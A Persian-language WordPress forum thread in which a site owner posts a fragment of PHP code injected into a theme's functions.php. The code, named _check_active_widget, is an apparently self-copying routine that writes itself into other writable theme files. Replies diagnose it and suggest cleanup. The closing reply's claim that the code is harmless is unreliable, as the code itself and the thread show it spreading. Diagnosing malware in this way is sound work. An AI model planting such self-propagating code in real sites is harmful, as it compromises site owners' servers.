• اطلاعیه ها

    • Morteza

      باهم بسازیم: اطلس ووکامرس و وردپرس   14/07/96

      تاپیک ایجاد شده برای بحث در جهت ایجاد یک منبع، ویکی، صفحات توضیحی و یا بخش آموزشی جامع برای وردپرس و متعلقات مختلف آن است. لطفا جهت مشارکت در این بحث، ارائه پیشنهاد و یا انتقاد به تاپیک فوق مراجعه کنید. باهم بسازیم: اطلس ووکامرس و وردپرس
sir1

سوال در مورد کدای مخرب

12 پست در این موضوع قرار دارد

سلام من یک قالبو تازه خریدم. دو سه روزه که نصب کردم در فایل functions.php این کدا اضاف شده. میشه بگید مزبوط به چی هستن؟


<?php
function _check_active_widget(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));

0

به اشتراک گذاری این پست


لینک به پست

بعضی از پوسته ها دارای کدهای مخربی هستند که میشه گفت از نسخه 3 به بعد ندیدم اما جدیدا باز باب شده

کا این خط ها پاک کنید و قالب های دیگری که در محل هستند و دارای این کد هستند پاک کنید و سطح دسترسی فانکشن روی 644 قرار دهید

1

به اشتراک گذاری این پست


لینک به پست

یه زحمت داشتم

کسی هست که دسترسیو بهش بدم هاستمو از فایلا و کدای مخرب بررسی کنه چون فک میکنم که هک شدم.

0

به اشتراک گذاری این پست


لینک به پست

هک نشدید

این کدها از پوسته های خراب خودشون منتقل میکنند به پوسته های سالم

گافیه پوسته های سالم جاگزین قدیمی ها بکنید

باز اگر نتونستید و... پ.خ بدید

1

به اشتراک گذاری این پست


لینک به پست

بعضی از پوسته ها دارای کدهای مخربی هستند که میشه گفت از نسخه 3 به بعد ندیدم اما جدیدا باز باب شده

کا این خط ها پاک کنید و قالب های دیگری که در محل هستند و دارای این کد هستند پاک کنید و سطح دسترسی فانکشن روی 644 قرار دهید

از کجا میگید این کدها مخرب هستند

ظاهرش این هست که برای بررسی فعال بود ویجت هست

1

به اشتراک گذاری این پست


لینک به پست

از کجا میگید این کدها مخرب هستند

ظاهرش این هست که برای بررسی فعال بود ویجت هست

از اونجایی که کد اتوماتیک در فانکشن تزریق میشه و در فایلی در کنار اون پوسته باشه تزریق میشه و بعد مدت کوتاهی سایت از کار میندازه و سایت بالا نمیاد

الان هر پوسته ببینید که توی محل theme بوده این کد قرار گرفته و زمانی که میخواهید پوسته عوض کنید صفحه سفید میشه

1

به اشتراک گذاری این پست


لینک به پست

من از این قالبها داشتم ولی هیچ مشکلی نداشتن

یعنی اون مشکلاتی رو که گفتید اصلا نداشت

1

به اشتراک گذاری این پست


لینک به پست

همه قالباتون رو دانلود کنید و از توی هاست حذفشون کنید و از توی لوکال ابتدا فایل فانکشن همه قالبها رو تو notepad++ باز کنید و یکی یکی کدهای اضافه شده رو پاک کنید و فسریع همه رو ذخیره کنید ولی نبندینشون تا اگه فایلی خواست دوباره خوشو اضافه کنه نتونه و در آخر سر هم همه رو باهم ذخیره کنید و ببندید تا از شرش راحت شید.

این راه حله امتحان شده توسط خودمه

2

به اشتراک گذاری این پست


لینک به پست

ممنون از راهنمایی دوستان. این کدای اضافی از قالبهای رایگانی بود که قبلا استفاده میکردم و روی هاست بود. همه اون قالبارو حذف کردم. الان دیگه درست شده.

0

به اشتراک گذاری این پست


لینک به پست

سعی کنید سطح دسترسی فایل ها رو کم کنید تا قابل نوشتن نباشد

1

به اشتراک گذاری این پست


لینک به پست

به طور خودکار دسترسی تمام فایلها بر روی 644 است و من هیچ کدامشو تغییر ندادم تا قابل نوشتن باشه.

0

به اشتراک گذاری این پست


لینک به پست

به طور خودکار دسترسی تمام فایلها بر روی 644 است و من هیچ کدامشو تغییر ندادم تا قابل نوشتن باشه.

کدهای شما کدهای مخرب یا ... نیستن و فقط یک فانکشن هست که بیشتر شبیه فانکشنای پوسته های ووکامرس هست که به صورت خودکار اضافه میشه برای چک کردن مثلا فعال بودن سبد خرید !

4

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری